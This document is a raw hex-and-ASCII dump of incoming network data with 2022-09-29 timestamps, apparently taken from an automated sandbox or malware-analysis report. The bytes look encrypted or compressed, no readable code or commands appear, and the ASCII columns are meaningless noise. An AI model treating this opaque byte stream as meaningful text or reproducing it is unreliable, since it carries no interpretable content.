                                                                                                                                                            2022-09-29 12:45:15 UTC19317INData Raw: e3 44 57 14 4f b2 bd 32 76 40 14 3d d8 ac 19 08 d2 41 3b 29 ba 71 70 d9 45 f5 81 c8 0f bd cc 0a 57 e9 68 42 ec ba e7 4d e3 67 6e f3 2e 2a ce 3b ab b9 09 24 fb 4b 15 88 cc e4 1c 6d bb 37 b1 c7 b8 9a 01 58 a6 85 eb df a5 46 06 7c 15 35 e3 92 f2 fe 7d 8b c7 fb b0 01 73 ee 3d 2c 00 10 e2 57 44 01 23 86 7d c0 d0 56 c1 5b 16 24 20 4e 77 74 12 3e b1 91 d0 fd 00 93 ee b9 43 ff 13 60 b4 89 d0 8b ea 82 28 1a 52 43 c9 d6 af 23 d5 29 8d 85 a3 97 99 7c 24 35 4b 39 79 40 4d 73 b9 67 ed 64 34 a3 2f 6e 3a f9 c3 72 6a 99 d6 76 7d c7 02 8e 43 0d 30 3b 13 2e 50 08 6a 19 fb 66 a7 fc 25 c7 80 27 36 f7 71 db 23 5b ce c6 f9 ea f6 14 17 88 50 59 17 ed c4 4f ce 62 99 0c 42 ba 5d d5 17 61 66 2e 17 ac f4 09 e5 3b e2 6a 2c 04 76 8d a8 13 1a 44 f3 3c a3 7d c2 b8 1f 76 33 98 72 3b 57
                                                                                                                                                            Data Ascii: DWO2v@=A;)qpEWhBMgn.*;$Km7XF|5}s=,WD#}V[$ Nwt>C`(RC#)|$5K9y@Msgd4/n:rjv}C0;.Pjf%'6q#[PYObB]af.;j,vD<}v3r;W
                                                                                                                                                            2022-09-29 12:45:15 UTC19333INData Raw: ce 8f 0c 81 32 f2 ef 4c 35 96 cf cf 0b 69 4b a5 e9 40 fc 61 e2 21 fc 63 da c3 ec 99 1a 20 54 90 9b 55 a5 b2 a1 9f 62 65 69 be 11 dd 71 ae 5e 6e 34 c3 18 6f 1b 78 1c 13 b4 09 e1 b1 26 f8 a4 e4 a9 bf ac d1 22 fb 8b 46 0d 80 a0 2d 17 b7 76 3c ca f9 34 7a a1 c1 08 87 1f aa 57 88 62 ec cb b6 74 0d 29 10 6f 19 89 09 4f a9 ed ca 4c ba 66 c2 aa 9e ef 4a 42 71 47 da 46 95 df b0 5a 04 fe c4 5c c7 d9 61 20 4a e6 8b 15 9a 1c 41 e3 fc 98 62 2c f2 60 42 45 e2 31 e4 46 dd 0f 82 18 37 d0 97 e4 d9 01 71 c9 e9 49 bd 17 b9 3b cd 5a 89 13 d7 54 fc 8a af b3 88 96 73 16 16 ab 33 eb a7 12 19 4e 01 c5 fd 36 c4 35 b9 1b b8 5a 88 fc b8 28 8a 3b 81 9e cf 1b 4b 8b 21 3c 63 97 74 9d 80 28 e2 a2 4a 7a de 04 04 42 64 8d 1d 7a 6a ef e6 56 64 bd dc 34 5d 7b 7a 7a 3d 95 e1 de 61 f4 a7 98
                                                                                                                                                            Data Ascii: 2L5iK@a!c TUbeiq^n4ox&"F-v<4zWbt)oOLfJBqGFZ\a JAb,`BE1F7qI;ZTs3N65Z(;K!<ct(JzBdzjVd4]{zz=a
                                                                                                                                                            2022-09-29 12:45:15 UTC19349INData Raw: b7 7f a7 3c 7e 53 10 69 28 c6 b1 f9 5d f9 10 c2 3c 9c b8 58 2a de bb 2e f6 a1 8e f6 48 44 2e 99 55 22 d9 e2 85 2a 12 a3 37 98 95 90 c2 4c a8 0f 07 75 2c 5d 9e 79 63 07 4a c7 cc 64 96 bf 20 6f b1 96 ff a3 0a d5 1c 35 40 ee 1c 1d 46 46 39 e8 50 d2 08 9a 09 16 39 ef e2 d1 b1 a1 27 56 12 65 c6 c4 79 d0 30 c6 25 0a 6d f8 95 ca 16 fb 6e 14 c0 3a 87 e4 c4 f3 c9 d6 3b dd ce 22 1f 53 54 de 89 1b 14 0d 9d 75 1b e1 3c 04 58 b8 ae 69 b8 be b9 c0 07 35 0d 11 c7 43 33 f1 3f 15 9e 9d 26 c5 15 95 3b 8a 86 e2 37 fe 38 29 9c 9f 64 1e 25 46 0f 3f 3f 3a 31 d1 24 da 02 3b 80 11 70 f1 e2 26 cc f9 14 f3 96 3e fc c2 55 a3 7f 0b 96 f1 16 f8 bf 29 f7 6e 76 02 66 54 32 5b ca f0 92 09 73 dd fb 4b 27 f1 17 c2 18 93 30 fa bd 0e 81 32 4a a9 a9 bb ef a7 76 1b ed 39 ef cd 36 f1 44 80 c8
                                                                                                                                                            Data Ascii: <~Si(]<X*.HD.U"*7Lu,]ycJd o5@FF9P9'Vey0%mn:;"STu<Xi5C3?&;78)d%F??:1$;p&>U)nvfT2[sK'02Jv96D
                                                                                                                                                            2022-09-29 12:45:15 UTC19365INData Raw: bb 17 39 a5 a8 c8 84 e9 8c ff 51 5c 0f 1b 5b d7 9a 89 18 69 9c 9b f6 57 d6 ec f2 bc cd 0a 9f d9 83 2b 31 33 d8 cf 37 7d ee 32 b9 c6 94 e8 69 d4 82 50 42 8a c3 86 12 5a 46 a4 70 46 47 0e 5c f5 2b 9d 21 33 43 c4 3b 5b 09 af a4 57 59 dd d7 e0 8c c4 71 55 8d 59 80 ee 3a 62 14 7b a1 68 b8 8b a8 ed 23 f3 45 a3 6f c7 b9 35 88 b7 fb 0c 7a 6a fc 9f 27 bf 43 b7 35 b1 c2 d0 9b 30 19 3f e1 28 63 87 a6 88 a1 88 a4 51 1c 31 87 c0 4a c5 79 bf 73 78 13 f2 fe c5 d1 d4 c9 c9 b8 04 f2 62 e8 59 f6 f3 9c c5 66 36 5f d7 b2 5a 83 fd e8 6e f2 16 b8 f8 11 d0 6c 97 37 f9 91 f4 0a bc 8d 34 69 f8 d4 84 24 3f ec c5 9b 57 6f 51 b9 f5 56 e5 c3 0f c6 78 1e ae 7a d8 e3 de 7c 4e 83 58 09 bb db 98 b7 2a 70 47 c1 5d 85 4e 3f d1 9f a4 8a 85 92 b0 33 05 43 b8 35 27 ee 25 cd d7 26 a2 3c 84 13
                                                                                                                                                            Data Ascii: 9Q\[iW+137}2iPBZFpFG\+!3C;[WYqUY:b{h#Eo5zj'C50?(cQ1JysxbYf6_Znl74i$?WoQVxz|NX*pG]N?3C5'%&<
                                                                                                                                                            2022-09-29 12:45:15 UTC19381INData Raw: af 49 8e 78 a4 30 46 3b 15 86 9b d1 0e d0 db 28 f8 09 da ff ee 89 c7 ef 57 7c ea d2 81 86 12 be 3f ec d2 d3 61 cf b0 95 e8 4f bb fe 67 9a 88 fa 30 e6 96 7c a7 61 22 1b 72 72 a6 8b c8 36 51 07 b5 32 b3 80 87 dc 2e 63 8f fa 55 66 6f 1f 71 ef 6e a6 54 a7 af e5 f8 09 3a f4 66 91 73 b7 e5 22 fa a5 84 b7 2d 25 d4 9c 93 65 00 2a 52 d5 3d 28 fe 63 d4 29 99 05 36 f5 94 96 bd 79 e9 b0 38 4c 78 3b 58 3f 0f 12 74 46 e0 34 c9 f8 45 5d a4 4e ae 7a ba 1d 22 a1 06 49 29 80 11 de 7d 53 d7 44 17 49 f2 24 8b c9 34 ce 68 96 40 de f1 0d c0 ec 3d fe 77 22 25 da 81 a2 03 03 02 54 f1 21 20 ed 4b 2d 7d 6d 85 b5 1d 0a 1e e7 dd dc 09 7d 81 c8 f6 6f 8c 61 2d da f5 3b fb a2 fc c7 a0 d0 bb 3c 90 64 f4 d9 4d af bb af 73 cb 37 9a 42 1a 08 71 72 68 0e 50 bb 46 41 86 08 ba 3e c4 9a cc 81
                                                                                                                                                            Data Ascii: Ix0F;(W|?aOg0|a"rr6Q2.cUfoqnT:fs"-%e*R=(c)6y8Lx;X?tF4E]Nz"I)}SDI$4h@=w"%T! K-}m}oa-;<dMs7BqrhPFA>
                                                                                                                                                            2022-09-29 12:45:15 UTC19397INData Raw: f9 4e a2 70 be 1a 6c 3c 4b a2 e3 77 de ff 0b d0 1a ce f5 de 39 8e 01 38 e1 b8 04 4b 0a 38 e7 e0 c1 eb 3a 74 45 aa 28 10 da a7 7d 39 f9 47 7f 1f 03 b8 3a aa c8 72 f5 a5 34 11 75 80 fb 92 2a 41 d0 7c 87 49 13 11 03 25 70 53 42 d8 4f f7 61 9a 1e 73 0a 24 4f 80 bc 8c 50 2e 18 f4 50 fd 53 b1 7d 1b 99 84 fd ac 7b 1a 43 4c c6 b5 0f ea e3 61 ed b3 f4 8b 1e c3 05 7b 63 19 33 7b c8 bb 38 73 08 0d b1 cc 60 00 d2 71 98 07 89 eb 70 59 a4 10 9e 06 2f 76 a9 8e e7 51 4e ac 93 de 42 87 1a ac 7c 86 67 c8 b0 80 dd 03 8a fd 5a 3f 33 0d d7 ed 05 b5 bf 5d 80 44 a9 4c 18 7a ed 07 4c ca 0b d9 f5 02 70 dc 61 f1 31 91 1d 30 54 68 b9 ec dc cb 4d 5a fb 83 44 c4 f2 bb 13 f7 c6 3b 5b 77 48 19 ce 44 03 12 83 67 2b 06 92 f2 50 bb 22 94 7b c6 9f 03 92 b5 50 fb bb 08 5e 57 63 8f 3a 50 ad
                                                                                                                                                            Data Ascii: Npl<Kw98K8:tE(}9G:r4u*A|I%pSBOas$OP.PS}{CLa{c3{8s`qpY/vQNB|gZ?3]DLzLpa10ThMZD;[wHDg+P"{P^Wc:P
                                                                                                                                                            2022-09-29 12:45:15 UTC19413INData Raw: 1c 09 85 3d cf 6a 96 e3 22 62 a9 f4 e4 53 96 57 1f f9 08 ef 72 c6 aa 0b bd 1f 26 1d dc 30 d8 3e 08 42 be af 04 6f f5 14 7f 5e c1 89 a5 56 e1 df 93 51 6d 09 69 06 fd 4a 99 71 a9 6f 98 e9 ee a0 e5 84 92 bc fe 48 1e 70 87 96 c1 81 c3 2a 43 55 58 be b6 ae b2 82 c1 a0 ce 3d b2 f2 18 ee ff bf b4 a4 d6 ab 7b 5f f0 ae bb 7e b3 28 1f 14 e4 5c 47 50 9a 04 e0 04 b1 92 5c de b4 41 3c 2e 3c 15 58 99 00 b6 4c 33 c7 e1 15 6d 43 6d 6d 76 fd 5a 32 98 81 b5 12 ce 6f c9 43 bf bd e6 5d 89 16 d7 4e 3c fe 0c 7c 8d aa cc 8e 84 16 bc 97 c0 bb 11 de 0a 6f 59 9b cb af 77 f6 28 8e a9 37 f1 1c db 22 a6 0a e1 aa 04 93 29 55 93 b5 eb ac c1 91 48 43 e2 53 e1 78 52 ff e4 fa a6 3d af 60 6a 99 77 00 fa ca 1a 64 a9 97 f7 d8 a7 df db 25 93 ba 43 ee 46 14 65 9a cc 31 21 eb 30 fc e9 83 f0 e3
                                                                                                                                                            Data Ascii: =j"bSWr&0>Bo^VQmiJqoHp*CUX={_~(\GP\A<.<XL3mCmmvZ2oC]N<|oYw(7")UHCSxR=`jwd%CFe1!0
                                                                                                                                                            2022-09-29 12:45:15 UTC19429INData Raw: c4 40 85 25 7e e5 8e 5b 0e b0 d6 e3 de 4b d2 1e 01 a6 72 40 fa 26 32 50 e3 68 0d 81 02 15 c4 b3 25 4e da a2 b8 32 bd 83 b0 d0 28 06 cc 8d 77 8e 41 f0 73 2d 5f 49 87 76 19 75 db fa c4 24 dd e8 dc 24 87 a9 e8 e4 17 1b ee ef 09 ec 0e 81 f3 a9 55 4f 16 e2 b7 b2 0f 6a ac 44 35 b3 10 90 89 76 e0 66 ab 06 15 0e 41 0a 15 fb 2f f1 8c 00 e7 1b b9 4d ef 33 63 d7 41 b6 30 66 7d 9d 13 87 32 56 b8 16 c5 f9 04 1a b8 a0 30 3b 3d 68 11 66 ac 0b 4c f1 a4 f5 17 f8 53 e1 f9 18 ce 6f 78 56 18 11 09 ea f2 9a d3 71 fd 7d 94 b9 01 0f 21 ab 62 dd 9a 08 d7 40 de a9 c1 79 b7 b1 9f f4 f8 66 4e 40 9e 2b 61 c9 33 65 55 31 a5 00 3c 47 3a a1 f9 aa 61 be 33 61 82 8c 88 6a 74 ff 72 95 01 43 96 cb cc 2c 10 f3 92 23 f5 ef df 49 ef 58 c5 cb b1 a9 c3 6c f1 22 84 53 ae 66 8d b2 53 72 bc 27 76
                                                                                                                                                            Data Ascii: @%~[Kr@&2Ph%N2(wAs-_Ivu$$UOjD5vfA/M3cA0f}2V0;=hfLSoxVq}!b@yfN@+a3eU1<G:a3ajtrC,#IXl"SfSr'v
                                                                                                                                                            2022-09-29 12:45:15 UTC19445INData Raw: 20 d2 ee 81 c4 59 44 de 62 8f cd cc 75 b2 c0 71 86 6a 94 32 a7 d1 af 5e 85 32 3e 62 60 85 00 6b 72 df 32 ec f3 2d a3 c9 87 52 93 b7 d2 d6 43 74 c9 aa 0f 97 d9 e0 67 29 95 54 93 9e b2 98 2c 74 0d 12 54 6b e0 cd 13 eb 0f 08 7d 9e 13 cb df 8d 80 22 37 06 b2 0b 2f 35 3b ab fa fa 73 15 1e cf da 57 1a 3d 60 17 d7 7f 60 33 97 4d c2 60 00 93 28 01 5f 46 f9 32 7c 48 2b dd 9f ec 0d c4 20 2c 5d c3 17 8f 0d 8e a9 61 89 ea e7 1c e7 11 32 ea bc 9e 29 67 45 ca 17 74 09 0a 3f 16 ac f8 72 a9 08 80 e0 be 5f 57 4a 36 74 b9 84 e5 d3 4d de 16 c1 c8 5a f5 fa bb 73 87 ee 70 02 73 4d bd 67 9a b9 63 14 e1 9e d1 d9 e5 35 08 ec e0 7e e2 d8 6c 97 2d 9b 10 ee ae 83 84 3a 26 ea 8a 97 9e de 6c e2 4b 4c 98 78 40 ba 27 4a 65 58 ea a8 11 c8 91 40 be a6 51 40 5d 4d 97 fd 40 4d 9d 18 57 c1
                                                                                                                                                            Data Ascii: YDbuqj2^2>b`kr2-RCtg)T,tTk}"7/5;sW=``3M`(_F2|H+ ,]a2)gEt?r_WJ6tMZspsMgc5~l-:&lKLx@'JeX@Q@]M@MW
                                                                                                                                                            2022-09-29 12:45:15 UTC19461INData Raw: 4e ed bf da 84 ff 20 bf 21 9e f9 f7 14 e9 28 47 61 86 9e fb 5a ce dd 7e 04 80 09 03 00 2d 6b 2a a7 2f 21 a6 56 21 ac 4f 9b 0a 1d ef 8d 17 a8 a0 86 74 63 03 47 09 f4 dc fa d7 4e ce cb 3e a6 3a 84 19 0a cd 1b ee ae 7b 9a 95 29 1d 87 d7 65 4d 10 b1 dd 77 06 57 78 b1 28 76 b2 5c a9 29 33 a1 44 3d 9f 9f 95 a4 57 5c 4e 2c c1 6c f0 56 c4 a4 8e 56 f6 75 21 19 6c d6 ae 0d 5c d1 f5 50 bf 67 73 04 13 78 77 66 60 6e 95 14 45 46 a2 a6 92 bd 78 77 50 d2 c6 84 6c 93 4e 4f 41 fe 5e 9b 2e 9d f1 cb a4 0f f6 f7 27 dd 98 b8 98 03 74 10 af 68 da ed b1 48 0d 4d 1e 07 e2 55 de 51 f3 df b1 43 ea 08 55 0d 36 b1 02 1e ab 54 af 1a 7d 29 29 7d b4 75 bd 08 bf 93 41 64 41 7c 84 18 91 72 9c d0 c5 8b f3 ec 3d ac 98 bf 7c d9 01 32 17 c5 28 71 ab 8b 86 63 97 f2 be d6 90 c9 e4 3a 4a 1f da
                                                                                                                                                            Data Ascii: N !(GaZ~-k*/!V!OtcGN>:{)eMwWx(v\)3D=W\N,lVVu!l\Pgsxwf`nEFxwPlNOA^.'thHMUQCU6T}))}uAdA|r=|2(qc:J
                                                                                                                                                            2022-09-29 12:45:15 UTC19477INData Raw: 94 73 e3 b0 85 35 a4 00 c6 ce a3 14 1e f5 78 81 04 3b a7 f0 f2 a2 bb 30 3b 7d fd 10 d8 0d b6 75 19 7b c5 c8 18 36 66 5b de 4a fd b7 66 33 8b 30 0a cd c3 6f eb d2 1c fb 0a af d2 11 b1 1c 08 14 c1 85 73 15 fd 67 6b cf 3b 80 a7 a8 b7 cd 97 d6 44 52 0c 47 e6 01 34 ab b1 cc 14 a8 35 7d 7b db f5 d5 b4 c3 f3 a5 3a 6b c7 c2 16 44 b8 8c b0 d3 14 1d f9 a6 1f 51 81 81 63 f2 c1 c2 a9 5d dd db de 47 e7 27 5f 11 91 00 8a 5a 57 4b f8 b0 f9 9b b9 11 19 58 43 0b 3b 9c 95 8b 3c b1 6d cf 65 26 41 bd 6b 48 2b f7 22 87 7d ab 64 fd ce 52 69 b8 f9 bb b1 68 5f 51 17 f6 6b ee c2 ea e9 f4 d7 ed 34 a0 8a 9b 25 2a a3 f8 2e d9 b3 e3 bb 04 4a 78 99 f2 cc 39 9b 1b 91 1e b2 53 b8 a2 5e 28 60 73 a6 ea e2 f0 8a e7 52 40 66 e4 1f ab df d4 53 3c 94 5f 9c 45 9c 5d 4b 88 4b ce c8 be 8d 02 5f
                                                                                                                                                            Data Ascii: s5x;0;}u{6f[Jf30osgk;DRG45}{:kDQc]G'_ZWKXC;<me&AkH+"}dRih_Qk4%*.Jx9S^(`sR@fS<_E]KK_
                                                                                                                                                            2022-09-29 12:45:15 UTC19493INData Raw: 30 f0 ad 7a ef 06 37 0d 78 3c f4 25 38 57 dc a4 f9 0c 63 4e 5a e5 2a 25 82 16 62 d6 70 7c 47 0b 32 99 cd 53 13 9a 3d 9f 06 58 63 f3 b4 9c ef 8d bb 5e 32 f4 26 a0 b1 f5 cb e1 be 44 57 ad 91 3b 75 46 70 b5 98 59 21 9d 68 c4 17 85 68 d5 e0 71 7f a8 47 7c be fe e6 a2 04 10 13 47 c3 49 75 63 dd 80 35 d9 15 ca cc a6 de aa a8 de a0 1f ad da 26 c5 01 08 73 b8 9b 85 a2 42 b9 5a 0d 6e a6 50 81 5c a2 66 30 f4 fe 4c a7 e9 95 ee cc 46 5d bf 92 d7 cd 94 27 23 10 de 61 2f 62 6d 32 1f 1a 70 be 4c 2e 3f c8 43 98 20 43 40 6e 57 ff 4b 25 f1 a9 8a 4a ac f6 11 13 ba 12 da 37 8e 3a fa 84 4c 95 3e 71 b7 80 46 f7 ca 5a 06 2c 1d 5b f6 3b 0a 1f 7f 30 60 63 ae e4 d6 4b 58 0b 6a a0 4f 52 b3 c0 bc 40 26 31 5d 24 16 66 56 a7 62 e3 c6 fe 3c d5 46 02 e6 5f b5 5b 24 5b 6d 59 bf c8 59 c7
                                                                                                                                                            Data Ascii: 0z7x<%8WcNZ*%bp|G2S=Xc^2&DW;uFpY!hhqG|GIuc5&sBZnP\f0LF]'#a/bm2pL.?C C@nWK%J7:L>qFZ,[;0`cKXjOR@&1]$fVb<F_[$[mYY
                                                                                                                                                            2022-09-29 12:45:15 UTC19509INData Raw: bb 51 a6 03 3c 60 61 37 ad e9 fc 33 d6 8b a3 ce da d6 ff 46 24 77 3a 32 83 53 f1 21 91 e1 e1 3e e0 33 f6 4a c0 3b b1 5a 38 37 ed eb 93 05 30 29 0e da ae d7 10 4c bd bf 15 01 ce 43 11 e8 50 22 0c 32 01 55 6f 36 6c 4b a0 b9 8e be af 03 fc 49 20 d5 71 d5 c4 e5 19 8a a1 10 13 75 1c 4b 41 ae af f6 a9 e1 c4 c9 a9 28 23 a1 b6 b3 7c 84 7d 7f 7d 3c 9c c8 0b 97 df 7f 7e 5d 4d e8 80 da 89 47 29 66 25 17 a5 e8 b8 1a 43 c9 dd 80 ba 00 05 21 ed 06 99 a5 c2 02 ce 06 dd 58 6c 86 20 31 e2 4d ea aa c2 e5 10 01 ad 29 89 58 4a 13 b6 1e b2 51 2e 17 f0 4b 02 f7 c2 27 53 1c b0 be 6f 34 17 3a 97 92 0c 96 2c 67 93 dd 3e 43 2d 81 3c 32 f5 2a 89 bf 79 99 34 63 59 05 c7 ef 57 7d ac fe 3f be 07 a1 a7 8b e0 25 14 00 04 7e 00 a1 e9 a9 d9 19 4d 5d 20 fb 6d 85 5b c0 ae e0 a2 87 ea 89 56
                                                                                                                                                            Data Ascii: Q<`a73F$w:2S!>3J;Z870)LCP"2Uo6lKI quKA(#|}}<~]MG)f%C!Xl 1M)XJQ.K'So4:,g>C-<2*y4cYW}?%~M] m[V
                                                                                                                                                            2022-09-29 12:45:15 UTC19525INData Raw: 67 c6 a1 8c 25 d8 51 c9 b1 4e 9c 5d 0a 80 00 19 1d 59 2a 82 7e 0a f9 3f a5 9c 67 63 58 64 bb fd ba 10 4c 81 5f 39 04 33 f5 cf 58 75 f2 8e f6 c6 9f 5e ff 2b 72 40 80 6e 3e 67 4d ff cf 67 28 4d fa 38 bb b1 b3 1e aa 2f bf e5 65 50 0f 89 e9 43 45 9e 0a 63 f6 0a 46 e5 f6 ac 58 00 61 83 1a d4 83 1e b7 ff 62 0d df d0 2a 3c 6f b6 5e 9e 7c 73 f9 5d a9 20 dc 8c 22 db 86 e3 f8 24 2e 06 fa 76 02 01 99 4c 91 f1 70 cb 51 db c1 3b e6 41 91 b6 23 6b 01 fa 7b 42 94 0e 1e a3 01 64 d5 75 9d 48 e1 33 55 cb 75 9f a6 dd 3d cf ce e1 6f a6 be 5d 47 f3 17 00 18 fb 0b d1 ab 3c 2e 5b 4a 77 0c bd 83 19 c6 36 de 5e 9e b5 ee f1 6b 0a 0c a1 67 67 74 56 46 c9 d0 fb 25 a7 8d 08 7e 52 f7 35 28 15 0b 41 6d 32 a4 92 10 1c f6 7d 60 4d 70 26 0d 47 ff 28 9e ed ef 15 b1 f7 03 b8 33 c9 e6 54 1a
                                                                                                                                                            Data Ascii: g%QN]Y*~?gcXdL_93Xu^+r@n>gMg(M8/ePCEcFXab*<o^|s] "$.vLpQ;A#k{BduH3Uu=o]G<.[Jw6^kggtVF%~R5(Am2}`Mp&G(3T
                                                                                                                                                            2022-09-29 12:45:15 UTC19541INData Raw: fd 3e 77 41 a3 31 4c 6e 10 5c 09 08 d8 7d ea 4a 68 43 1b 79 36 1a 93 0b 2c da 39 84 51 56 ec da af f5 99 1e eb 1a 95 37 e5 9c c8 ed 89 b3 f1 49 30 86 ec 9f 50 9c 96 83 52 4d 44 35 8c 54 49 91 d2 cc 94 e1 99 53 4c 78 44 aa 83 68 67 e2 42 98 76 c3 a8 8c 2f 4f 5a 48 3d ec 5e 6e f2 0d 31 e3 f7 10 4a 5d 5b 60 8c 6a d2 17 ce 25 9a 4d 5c ac 9c 31 87 07 bc 34 4f 8b dd c7 de af 09 04 87 27 4f f6 3c 1a 0f 5e 7f 75 dd 2e 6e 38 90 02 b8 31 e7 35 cb a1 55 73 fa 96 e1 5c 79 97 f5 04 46 d0 02 cd 4f 06 1f 05 c2 81 1e 7f dd f6 b6 86 e5 e7 9a 4c 2f fc 6e 7f 15 64 7a 86 a8 6a e0 49 6b b4 ca c8 9b 0d c2 7b 94 0b 52 31 b5 98 38 cb e3 49 0c 9e 02 28 a4 2b f6 b7 bc 01 46 53 d2 1a b8 44 70 12 21 b1 d8 6f e3 fa 01 62 37 ed 7e 80 f6 81 d6 1b 92 0e 13 2f 9a bc 42 93 30 77 10 da 33
                                                                                                                                                            Data Ascii: >wA1Ln\}JhCy6,9QV7I0PRMD5TISLxDhgBv/OZH=^n1J][`j%M\14O'O<^u.n815Us\yFOL/ndzjIk{R18I(+FSDp!ob7~/B0w3
                                                                                                                                                            2022-09-29 12:45:15 UTC19557INData Raw: b8 e2 c7 fd 54 dd cc 52 4f 93 0d 5e 99 96 d8 90 c3 d0 01 7f ab a3 66 6f eb 37 40 c2 d7 d6 5e dd 22 25 55 46 a9 74 07 71 22 7c 44 dc 67 1f ae a7 96 74 ff 74 c5 26 1f ee 9f 59 6b 49 ae 4b 51 18 f2 71 d2 9b 4b 23 33 46 b5 a6 87 e9 11 db f0 68 db 1f 38 c1 2e 81 d1 17 25 bd 8a a5 32 8c f6 d3 eb c1 89 77 82 07 af 25 2e 37 60 b5 13 e2 fe 06 3f 72 9a eb 5a ee 52 7c c9 49 c0 74 47 4d c6 d9 05 4e 96 17 b8 56 28 35 63 95 0a e6 79 d1 34 03 27 f5 61 e6 a3 a8 37 83 b2 58 8a 90 01 93 fe 24 e0 1b cb 7f 48 89 be f0 f2 18 0c 28 1c c8 8e ca e6 e1 d1 fd 26 cc ae 40 55 95 16 56 63 60 b0 7c c2 d6 10 1c 39 9a 2b db 4c 66 f5 d2 66 ca 4a a1 bd 4a f6 e8 9f 6e 45 24 d3 f1 02 da 59 62 94 87 84 67 8e 8a 39 ac 42 1e 41 14 2d e0 45 09 6c 1f e9 6e 33 fc 2a 7b 20 34 ff d0 15 fb 82 5f 15
                                                                                                                                                            Data Ascii: TRO^fo7@^"%UFtq"|Dgtt&YkIKQqK#3Fh8.%2w%.7`?rZR|ItGMNV(5cy4'a7X$H(&@UVc`|9+LffJJnE$Ybg9BA-Eln3*{ 4_
                                                                                                                                                            2022-09-29 12:45:15 UTC19573INData Raw: 6b 45 c2 40 4d 35 45 f7 b8 6a 5c 05 86 73 0c eb 9b dc 30 6f 6a f2 99 76 f5 12 4a d2 58 eb a3 78 af b9 43 c1 3c 2a f1 fc a5 0b 4c 93 9b 00 64 66 40 9a 34 46 41 cf 17 1c 52 3f 79 a7 6b de 05 d0 fb 27 54 e9 97 ed 79 2d 33 20 0b 0a f6 16 31 76 6c 0a c8 6f bc 8c 76 8f 8c 08 f5 3a f7 86 eb 32 de 84 3f 1f fd fb 98 44 8c aa 2b e6 11 88 03 ca 5c b2 8d f6 1f ac 43 e5 ad 67 be 54 74 71 f7 0d e4 c8 93 94 c7 89 59 e8 00 7e ff 30 6e cb 99 37 a7 f4 42 f8 d1 1a 96 be da cc 70 26 b1 6d ac ba ec de b3 c3 77 ae 58 17 bb 8a b4 28 a7 05 f0 fa 63 38 53 66 16 e7 df 49 18 38 67 28 8b be a1 7e fc f7 4f fb 68 ba 86 e7 73 56 69 16 f7 43 ec 4c 39 87 bf 92 f7 6b a7 0f d4 18 57 18 f0 2d ea 8c fa bd e1 e8 fc 30 f9 2c 54 eb a0 d9 9c 99 22 24 9e 58 a5 df 8d f3 86 bb 0a 2b 6b 26 68 40 b8
                                                                                                                                                            Data Ascii: kE@M5Ej\s0ojvJXxC<*Ldf@4FAR?yk'Ty-3 1vlov:2?D+\CgTtqY~0n7Bp&mwX(c8SfI8g(~OhsViCL9kW-0,T"$X+k&h@
                                                                                                                                                            2022-09-29 12:45:15 UTC19589INData Raw: ce 2e 2f 6f 4d 2d b4 80 5a 82 c7 4c 79 67 d3 30 cd ba cb 23 78 ed 6f e6 29 f7 85 02 19 0c f6 8d e1 5f 7f ff 1a 3c 22 c0 d0 40 e8 de ea 55 db 63 45 ec bd 08 2b bd 63 12 a5 c0 cd 64 f2 2a d7 ed 21 d0 95 c5 ad 75 bb 4a 64 0f 88 05 f4 e6 2e ad 83 ac 7a 96 dd fe be d6 78 2f cc fa 62 4c 73 ac 21 60 49 ab d0 49 b9 2f ee c0 b6 a0 85 29 db 8c ab 76 0b 01 a1 88 e2 78 e4 ea af c9 88 0c e0 bb 7d f6 60 59 2f f3 61 da 83 79 b3 65 c8 7b dd 41 fc e4 fb 50 52 09 3c f7 df a2 f0 62 39 48 69 68 78 29 94 f4 ca 8a 68 90 cf fe 34 9e 05 67 ba 21 3d 9d fe b8 da 32 28 1b 0e ff 37 d1 18 a1 48 80 84 4d 4e 30 ca aa 75 95 78 de 80 f3 8d 34 40 06 e5 37 3d c9 e9 49 43 14 dc f1 55 f9 58 ea ff 9f 05 17 ed 80 3f 35 30 4d 5f 0e cc bb 62 53 43 c7 01 e5 32 19 e6 26 ad d9 30 5f 0a e8 a5 f8 98
                                                                                                                                                            Data Ascii: ./oM-ZLyg0#xo)_<"@UcE+cd*!uJd.zx/bLs!`II/)vx}`Y/aye{APR<b9Hihx)h4g!=2(7HMN0ux4@7=ICUX?50M_bSC2&0_
                                                                                                                                                            2022-09-29 12:45:15 UTC19605INData Raw: b0 fa 79 c7 b9 9a 76 41 dd d7 67 7c 54 ad 25 32 fa e9 7c 4c bc d8 f1 c0 57 a7 6e 68 30 b9 fb b1 7a 98 4e 1f 87 15 76 f8 87 37 24 23 2e 68 cb 72 24 f4 85 6b 0a 13 ad b4 1c eb a4 90 11 03 e4 47 cb 40 21 7e 1d 6f 43 f8 d5 1e 78 95 9c ad 3f 7c 99 99 50 e8 9b 23 38 d7 50 4b d2 c6 e0 20 5c 6f 32 c9 c3 52 d5 7f bd 3a 78 ee 10 5e fa 49 80 b8 7e 1b 19 93 08 5b af dc 3b c8 3f 66 a2 8f c3 6e b3 44 47 ec 29 d0 2a 48 1d 67 4b 6c 51 be 3e 76 b1 b0 72 d9 e6 f6 ad 94 21 28 06 7d 25 d9 2e fb bb 65 e8 42 59 4d 6d f9 48 b2 e1 75 b4 c3 c6 d2 ef 6a 6a fa 51 67 33 84 c9 b9 a5 5d 90 46 3e 21 24 8d f3 dd 44 cb 20 ee b1 77 5b 71 19 a3 d1 d9 17 91 9a fd 3b fc 42 4c f6 19 4d 71 f2 fe df 39 ff 52 e4 c1 56 53 19 a8 d5 ab 7c e9 50 3a 57 07 d1 bb 72 c4 56 c6 5c 49 f0 dc 8a b2 1a 77 c4
                                                                                                                                                            Data Ascii: yvAg|T%2|LWnh0zNv7$#.hr$kG@!~oCx?|P#8PK \o2R:x^I~[;?fnDG)*HgKlQ>vr!(}%.eBYMmHujjQg3]F>!$D w[q;BLMq9RVS|P:WrV\Iw
